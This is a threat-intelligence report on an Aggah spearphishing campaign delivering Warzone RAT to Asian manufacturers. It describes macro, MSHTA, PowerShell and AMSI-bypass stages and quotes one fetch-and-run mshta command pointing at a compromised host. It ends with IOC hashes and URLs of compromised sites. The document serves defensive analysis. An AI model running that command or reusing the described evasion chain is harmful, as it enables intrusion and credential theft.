<p>Authored by: Tara Gould and Rory Gould</p> <h2>Key Findings</h2> <ul> <li>Spearphishing emails are targeting the manufacturing industry in Taiwan and South Korea to spread malware.</li> <li>Compromised websites are being used to host malicious JavaScript, VBScript and PowerShell scripts; delivering Warzone RAT.</li> <li>Anomali Threat Research assesses with moderate confidence that this campaign is being conducted by the threat group, Aggah.</li> </ul> <h2>Overview</h2> <p>Anomali Threat Research discovered a spearphishing campaign that appears to have begun in early July 2021, targeting the manufacturing industry throughout Asia. The tactics, techniques, and procedures (TTPs) identified in this campaign align with the Aggah threat group. Our analysis found multiple PowerPoint files that contained malicious macros that used MSHTA to execute a script utilizing PowerShell to load hex-encoded payloads. Based on the TTPs of this campaign, we assess with moderate confidence this is Aggah.</p> <h2>Aggah</h2> <p>Aggah is an information-motivated threat group that was first identified in March 2019 by researchers from Unit 42.<sup>[1]</sup> The researchers initially believed the activity was a campaign targeting entities in the United Arab Emirates (UAE). Further investigation by the same team revealed it to be a global phishing campaign designed to deliver RevengeRat.<sup>[2]</sup></p> <p>Unit 42 first assessed, due to shared high level TTPs as well as the use of RevengeRat, Aggah was associated with the Gorgon Group, a Pakistani group known for targeting Western governments.<sup>[3]</sup> However, there were prominent Gorgon Group indicators not observed during that investigation, and therefore Unit 42 was unable to formally associate Aggah with the Gorgon Group. Other researchers agree that Aggah is an Urdu speaking Pakistani group due to the use of Urdu words written in Latin script, but stress this does not mean they are the Gorgon Group.<sup>[4]</sup></p> <p>Aggah has been consistently active since 2019, generally using the same identifiable TTPs, in 2020 the group conducted a campaign targeting the Italian manufacturing sector.<sup>[5]</sup> Later that same year, Aggah were observed likely selling or loaning malware to lower-level Nigerian actors.<sup>[6]</sup> Historically the group has used Internet Archive, Pastebin and Blogspot to host malicious scripts and payloads, usually RevengeRAT.<sup>[7]</sup> The move to using compromised sites is likely due to fact the Internet Archive hosted files are being taken down much quicker and is a notable change for Aggah.</p> <h2>Technical Analysis</h2> <h3>Email</h3> <p>The infection process began with a custom spearphishing email masquerading as “FoodHub.co.uk”, an online food delivery service based in the United Kingdom. The body of the email contained order and shipping information along with an attached PowerPoint file named “Purchase order 4500061977,pdf.ppam”. The email in Figure 1 below was sent on July 8, 2021 to Fon-star International Technology, a Taiwan-based manufacturing company. Other spearphishing emails were sent to CSE group, a Taiwanese manufacturing company, FomoTech, a Taiwanese engineering company, and to Hyundai Electric, a Korean power company. Spoofed business-to-business (B2B) email addresses against the targeted industry is activity consistent with Aggah.<sup>[8]</sup></p> <p style="text-align: center;"><em><strong><img alt="Spoofed Spearphishing Email Sent to Fon Star" src="https://cdn.filestackcontent.com/V07pWmxCSNCzSA5ZAhep"/><br/> Figure 1</strong> - Spoofed Spearphishing Email Sent to Fon Star</em></p> <h3>PowerPoint File</h3> <p><strong>File name </strong>Purchase order 4500061977,pdf.ppam<br/> <strong>MD5 </strong>b5a31dd4a6af746f32149f9706d68f45</p> <p>When we analyzed the PowerPoint file, we found obfuscated macros (Figure 2) contained in the document that used MSHTA to execute JavaScript from “http://j[.]mp/4545hhhsdf3qassd3asd2”, which resolved to “mail.hoteloscar.in/images/5[.]html”. At the time of publishing, the site was still hosting the malicious script. “J.mp” is a URL shortener service part of Bitly.</p> <p style="text-align: center;"><em><strong><img alt="Macro" src="https://cdn.filestackcontent.com/gczcDJnwTPChVIQfntJw"/><br/> Figure 2</strong> - Macro</em></p> <p>Hoteloscar.in is the legitimate website for a hotel in India that has been compromised to host malicious scripts. Throughout this campaign, we observed legitimate websites being used to host the malicious scripts, most of which appeared to be WordPress sites, indicating the group may have exploited a WordPress vulnerability.</p> <p>Viewing the page source, there was obfuscated JavaScript, as shown in Figure 3.</p> <p style="text-align: center;"><em><strong><img alt="Obfuscated JavaScript on Hoteloscar.in" src="https://cdn.filestackcontent.com/fC1BDWxoSoitm4vIhuQr"/><br/> Figure 3</strong> - Obfuscated JavaScript on Hoteloscar.in</em></p> <p>The JavaScript utilized anti-debugging techniques such as, using setInterval to detect the use of a debugger based on the execution time, which will go into an infinite loop if a debugger is detected. After the debugging checks, the script returned “mshta http://dlsc.af/wp-admin/buy/5[.]html”, another compromised website for an Afgan food distributor, shown in Figure 4.</p> <p style="text-align: center;"><em><strong><img alt="mshta http://dlsc.af/wp-admin/buy/5.html" src="https://cdn.filestackcontent.com/HMGddYn2RJWENksyiwS4"/><br/> Figure 4</strong> - “mshta http://dlsc.af/wp-admin/buy/5.html”</em></p> <p>Once directed to “dlsc.af” an obfuscated script (Figure 5) created a PowerShell process to execute another PowerShell file hosted on dlsc.af, “party.txt”.</p> <p style="text-align: center;"><em><strong><img alt="Obfuscated HTA Script" src="https://cdn.filestackcontent.com/5rWgHS3TTujyEdgvDTVE"/><br/> Figure 5</strong> - Obfuscated HTA Script</em></p> <p style="text-align: center;"><em><strong><img alt="Script to Download AV Checks File" src="https://cdn.filestackcontent.com/gK4h7Q0PTpi2SeNFYY4b"/><br/> Figure 6</strong> - Script to Download AV Checks File</em></p> <p>Party.txt, shown in Figure 7, was a PowerShell file that checked for the antivirus status. Four conditions were checked:</p> <ul> <li>Windows Defender status</li> <li>ESET status</li> <li>If Windows Defender is stopped</li> <li>If neither are running</li> </ul> <p>Based on these criteria, a PowerShell file is downloaded depending on the antivirus status, which contained a hex encoded loader and payload. Based on these checks, a different loader was used to inject the Warzone payload into various legitimate processes.</p> <p style="text-align: center;"><em><strong><img alt="Party" src="https://cdn.filestackcontent.com/fs2fM6t3TZqR8rXkwr32"/><br/> Figure 7</strong> - Party.txt</em></p> <p>For the purposes of this reporting this analysis will focus on the infection chain when Windows Defender was running on a targeted system. With Windows Defender running, “wd.txt” a Powershell file, was downloaded and executed. The infection chain was largely similar against the other antivirus statuses, ESET and no antivirus running.</p> <p style="text-align: center;"><em><strong><img alt="Screenshot of “wd.txt”" src="https://cdn.filestackcontent.com/75UTBhqiSlWOtytWZs2h"/><br/> Figure 8</strong> - Screenshot of “wd.txt”</em></p> <p>The first function, represented in Figure 8, was decoded using a rolling XOR function shown in Figure 9. This loaded a DLL into memory via reflective DLL injection designed to be used as an AMSI (Anti Malware Scripting Interface) bypass.</p> <p style="text-align: center;"><em><strong><img alt="Decoding function" src="https://cdn.filestackcontent.com/KqzCtUZIRraAeN5lAR6l"/><br/> Figure 9</strong> - Decoding function</em></p> <p>AMSI allows for security products to be integrated with applications. AMSI bypass is performed by memory patching, which changed the behavior of the function AmsiScanBuffer. The code loaded ‘amsi.dll’ with LoadLibrary, used GetProcAddress to locate the function in memory and then overwrites using VirtualProtect. The DLL Aggah used to bypass AMSI (shown in Figure 10) was taken from Mor Davidovich, a pentester who wrote the code to evade Windows Defender.<sup>[9]</sup></p> <p style="text-align: center;"><em><strong><img alt="Class AMS that is Loaded for AMSI Bypass" src="https://cdn.filestackcontent.com/EAjsI3ieRqGfrKCiXk6D"/><br/> Figure 10</strong> - Class AMS that is Loaded for AMSI Bypass</em></p> <p style="text-align: center;"><em><strong><img alt="Snippet of Hex Encoded Payload" src="https://cdn.filestackcontent.com/9cKSuD7mROutGZPx9ypM"/><br/> Figure 11</strong> - Snippet of Hex Encoded Payload</em></p> <p>After the AMSI bypass, the variable $HH, which is a hex-encoded payload of Warzone RAT (Figure 11), was loaded into memory and injected into an ASP.NET compiler process.</p> <p style="text-align: center;"><em><strong><img alt="Process Hollowing Function" src="https://cdn.filestackcontent.com/U9068MNTQv6yy2jVasdF"/><br/> Figure 12</strong> - Process Hollowing Function</em></p> <p>As shown in Figure 12, the loader was used to load and inject Warzone into an ASP.NET compiler process. Under the condition of ESET running or no antivirus running, the same payload was loaded and injected into an MSBuild process using either k.HackItUp or VNPT.B injector DLLs.</p> <h3>Warzone RAT</h3> <p><strong>MD5 </strong>5540511a186c7e9dd1c1465b3b5c8197</p> <p>Warzone RAT is a commodity info stealer written in C++ that is widely available for purchase on criminal forums. Warzone is a commodity malware, with cracked versions hosted on GitHub. The RAT reuses code from the Ave Maria stealer.<sup>[10]</sup> The functionality of Warzone includes:<sup>[11]</sup></p> <ul> <li>Privilege Escalation</li> <li>Keylogging</li> <li>Remote Shell</li> <li>Download and execute Files</li> <li>File manager</li> <li>Persistence</li> </ul> <p>To bypass User Account Control (UAC), the Windows Defender path was added to a PowerShell command to exclude it. Privilege escalation in Warzone was carried out using sdclt.exe, a Windows backup utility in Windows 10.</p> <p style="text-align: center;"><em><strong><img alt="Exclusion Path for PowerShell Command" src="https://cdn.filestackcontent.com/YwkmHMlSPSBQ7Sr2VsUw"/><br/> Figure 13</strong> - Exclusion Path for PowerShell Command</em></p> <p style="text-align: center;"><em><strong><img alt="Warzone Frequently Makes Mention of Security Researchers and Midgetporn" src="https://cdn.filestackcontent.com/s7uHLCtpQsmAzNVH8dA5"/><br/> Figure 14</strong> - Warzone Frequently Makes Mention of Security Researchers and Midgetporn</em></p> <p>Warzone has the capabilities to steal credentials from a range of browsers and email clients. Shown in Figure 14, these include:</p> <ul> <li>Chromium</li> <li>Foxmail</li> <li>Google Chrome</li> <li>Microsoft Edge</li> <li>Opera</li> <li>Outlook</li> <li>QQ Browser</li> <li>Thunderbird</li> <li>UC Browser</li> </ul> <p style="text-align: center;"><em><strong><img alt="Credential Stores Warzone Checks" src="https://cdn.filestackcontent.com/hd7c9XZJQHikBAvT1DZO"/><br/> Figure 15</strong> - Credential Stores Warzone Checks</em></p> <h2>Attribution</h2> <p>The TTPs used in this campaign align with previous activity of the group known as Aggah. The attribution to Aggah is based on:</p> <ul> <li> <p>Obfuscated payloads in a PowerShell file, typically hex-encoded.</p> </li> <li> <p>Previous campaigns of Aggah used ‘j.mp’ URL shortener.</p> </li> <li> <p>Reuse of class names, k.HackItUp, VPNT.B, A.B.</p> </li> <li> <p>Spoofed B2B email addresses within target industry.</p> </li> <li> <p>The use of malicious documents, and malicious PowerPoint files containing macros is common among Aggah’s previous TTPs.</p> </li> <li> <p>Themes of order and payment information.</p> </li> <li> <p>Use of scripts embedded in websites.</p> </li> <li> <p>Use of ‘RegWrite mshta “url”’ is seen commonly in Aggah campaigns.</p> </li> </ul> <h2>Conclusion</h2> <p>While Aggah has been active since at least 2019 and is known for hosting payloads on the Internet Archive and BlogSpot, this recent campaign suggests the group may have the ability to evolve. The move towards abusing compromised sites shows an ongoing ability to adapt as the use of these sites will aid in evading detection, especially with BlogSpot sites being taken down and many payloads being promptly removed from the Internet Archive.</p> <h2>Endnotes</h2> <p><sup>[1]</sup> Robert Falcone and Brittany Barbehenn, “Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign,” Unit42, accessed July 29, 2021, https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/.</p> <p><sup>[2]</sup> Ibid.</p> <p><sup>[3]</sup> Ibid.</p> <p><sup>[4]</sup> M, Winston,““Aggah” campaign continues: Urdu speaking Threat Actor behind the latest campaign which delivers Loki Bot Spyware,” Medium, published April 13, 2021, accessed July 29, 2021, https://winstonmmd.medium.com/?p=c37c08624308.</p> <p><sup>[5]</sup> “Cyber-Criminal Espionage operation insists on Italian Manufacturing,” Yoroi, accessed July 29, 2021, published May 22, 2020, https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/.</p> <p><sup>[6]</sup> Paul Burbage, “Aggah: Not Exactly APT,” Medium, accessed July 29, 2021, published February 7 2020, https://medium.com/@paul.k.burbage/aggah-not-exactly-apt-5e51aaff95f5.</p> <p><sup>[7]</sup> Luigi Martire and Luca Mella, “The "WayBack" Campaign: a Large Scale Operation Hiding in Plain Sight,” Yoroi, accessed July 29, 2021, published June 29, 2020, https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/?web_view=true.</p> <p><sup>[8]</sup> Alex Holland, “Aggah Campaign’s Latest Tactics: Victimology, PowerPoint Dropper and Cryptocurrency Stealer,” HP, accessed July 29, 2021, published July 1, 2020,https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/.</p> <p><sup>[9]</sup> “Amsi Bypass Post,” Dec0ne, accessed August 5, 2021, published November 8, 2019, https://dec0ne.github.io/research/2019-11-08-Amsi-bypass-post/.</p> <p><sup>[10]</sup> “Warzone 1.0 RAT Analysis Report,”, Domain Tools, accessed July 29, 2021, published September 11, 2019, https://www.domaintools.com/resources/blog/warzone-1-0-rat-analysis-report.</p> <p><sup>[11]</sup> “Warzone RAT,” Warzone, accessed July 29, 2021, https://warzone.pw/.</p> <h2>MITRE ATT&CK</h2> <table class="table table-striped"> <tbody> <tr> <td><strong>Technique</strong></td> <td><strong>ID</strong></td> <td><strong>Name</strong></td> </tr> <tr> <td><strong>Initial Access</strong></td> <td>T1566.001</td> <td>Phishing: Spearphishing Attachment</td> </tr> <tr> <td><strong>Execution</strong></td> <td>T1059</td> <td>Command Line Interface</td> </tr> <tr> <td> </td> <td>T1059.001</td> <td>PowerShell</td> </tr> <tr> <td> </td> <td>T1059.007</td> <td>JavaScript</td> </tr> <tr> <td> </td> <td>T1204.002</td> <td>User Execution: Malicious file</td> </tr> <tr> <td><strong>Persistence</strong></td> <td>T1547.001</td> <td>Registry Run Keys</td> </tr> <tr> <td><strong>Privilege Escalation</strong></td> <td>T1548.002</td> <td>Bypass User Account Control</td> </tr> <tr> <td> </td> <td>T1055</td> <td>Process Injection</td> </tr> <tr> <td> </td> <td>T1055.012</td> <td>Process Hollowing</td> </tr> <tr> <td> </td> <td>T1547.001</td> <td>Registry Run Keys/Startup Folder</td> </tr> <tr> <td> </td> <td>T1055.001</td> <td>Dynamic-link Library Injection</td> </tr> <tr> <td><strong>Defense Evasion</strong></td> <td>T1140</td> <td>Deobfuscate/Decode Files or Information</td> </tr> <tr> <td> </td> <td>T1562.001</td> <td>Impair Defenses: Disable or Modify Tools</td> </tr> <tr> <td> </td> <td>T1218.005</td> <td>Signed Binary Proxy Execution: Mshta</td> </tr> <tr> <td><strong>Credential Access</strong></td> <td>T1056</td> <td>Input Capture</td> </tr> <tr> <td> </td> <td>T1056.001</td> <td>Keylogging</td> </tr> <tr> <td> </td> <td>T1552.001</td> <td>Credentials In Files</td> </tr> <tr> <td><strong>Lateral Movement</strong></td> <td>T1021.001</td> <td>Remote Desktop Protocol</td> </tr> <tr> <td><strong>Discovery</strong></td> <td>T1057</td> <td>Process Discovery</td> </tr> <tr> <td> </td> <td>T1082</td> <td>System Information Discovery</td> </tr> <tr> <td> </td> <td>T1082</td> <td>File and Directory Discovery</td> </tr> <tr> <td><strong>Collection</strong></td> <td>T1125</td> <td>Video Capture</td> </tr> <tr> <td> </td> <td>T1114.001</td> <td>Email Collection: Local Email Collection</td> </tr> <tr> <td><strong>Command and Control</strong></td> <td>T1105</td> <td>Ingress Tool Transfer</td> </tr> </tbody> </table> <h2>IOCs</h2> <h3>Maldocs and Payloads</h3> <p>b5a31dd4a6af746f32149f9706d68f45<br/> 2fa7913a5aba4c9adcd82b93fe1356a1<br/> 4b9d71b29bdb33dd2f12ff885b05ac3e<br/> c5abec8c7c276d286238343595323fde<br/> 5540511a186c7e9dd1c1465b3b5c8197<br/> 16c518de87f7bc9120fa633b9d8192be<br/> 2196d698d115bcc255a416aa6f2fd842<br/> 16382fbc7fe46ea16a20a672ade46fc2<br/> 177bf22700921e7dcfd1ee275f9d9ada<br/> b83b57a84f4936412042fdd1ed7161d2<br/> 6f7c2413d98d2d5987fda30b6c90eec6</p> <h3>Compromised sites</h3> <p>http://dlsc.af/wp-admin/buy/5.html<br/> https://mail.hoteloscar.in/images/1.html<br/> https://mail.hoteloscar.in/images/2.html<br/> https://mail.hoteloscar.in/images/3.html<br/> http://mail.hoteloscar.in/images/4.html<br/> http://mail.hoteloscar.in/images/5.html<br/> https://mail.hoteloscar.in/images/6.html<br/> https://mail.hoteloscar.in/images/7.html<br/> https://mail.hoteloscar.in/images/8.html<br/> https://mail.hoteloscar.in/images/9.html<br/> https://mail.hoteloscar.in/images/10.html<br/> http://dlsc.af/wp-admin/buy/8.html<br/> https://dlsc.af/jango/4.html<br/> https://dlsc.af/jango/3.html<br/> https://dlsc.af/jango/2.html<br/> https://dlsc.af/jango/1.html<br/> https://dlsc.af/jango/7.html<br/> https://elmerfloyd.com/wp/4.txt<br/> http://elmerfloyd.com/ru/doc<br/> https://elmerfloyd.com/ru/Server.txt<br/> https://elmerfloyd.com/ru/Server2.txt<br/> http://elmerfloyd.com/ru/doc/server.txt<br/> https://elmerfloyd.com/ru/<br/> https://elmerfloyd.com/ru/st/ALL.txt<br/> https://elmerfloyd.com/ru/st/Server.txt<br/> https://elmerfloyd.com/ru/doc/Server.txt<br/> https://elmerfloyd.com/ru/doc/ex/Encoding.txt<br/> https://elmerfloyd.com/ru/doc/ex/ALL.txt</p> <h2>Appendix</h2> <p style="text-align: center;"><em><strong><img alt="Similar Campaign Found on Compromised Site of Elmer Floyd, a North Carolina State Representative" src="https://cdn.filestackcontent.com/QLEyjxu4REuIGOV37brj"/><br/> Figure 16</strong> - Similar Campaign Found on Compromised Site of Elmer Floyd, a North Carolina State Representative</em></p> <p style="text-align: center;"><em><strong><img alt="Directory of Malicious Files Hosted on Elmer Floyd Compromised Site" src="https://cdn.filestackcontent.com/KNQNEJspTo6ZdITEqbpK"/><br/> Figure 17</strong> - Directory of Malicious Files Hosted on Elmer Floyd Compromised Site</em></p> <p style="text-align: center;"><em><strong><img alt="Another Example of a Spoofed Email. This one appears to be spoofing Chemtron, a chemical plant." src="https://cdn.filestackcontent.com/qsl2rNC3QiWQ0uXKcqzD"/><br/> Figure 18</strong> - Another Example of a Spoofed Email. This one appears to be spoofing Chemtron, a chemical plant.</em></p> <p style="text-align: center;"><em><strong><img alt="Same PowerPoint File Sent in Another Spearphishing Email to Hyundai" src="https://cdn.filestackcontent.com/DUVESiz8SdGaw46jUziv"/><br/> Figure 19</strong> - Same PowerPoint File Sent in Another Spearphishing Email to Hyundai</em></p> <p style="text-align: center;"><em><strong><img alt="Another Example of a Spearphishing Email. This one is imitating a real employee from Rexel Group, a US management services company, with a PowerPoint file containing macros." src="https://cdn.filestackcontent.com/BOkbGWZiTP2Agpeu34lS"/><br/> Figure 20</strong> - Another Example of a Spearphishing Email. This one is imitating a real employee from Rexel Group, a US management services company, with a PowerPoint file containing macros.</em></p>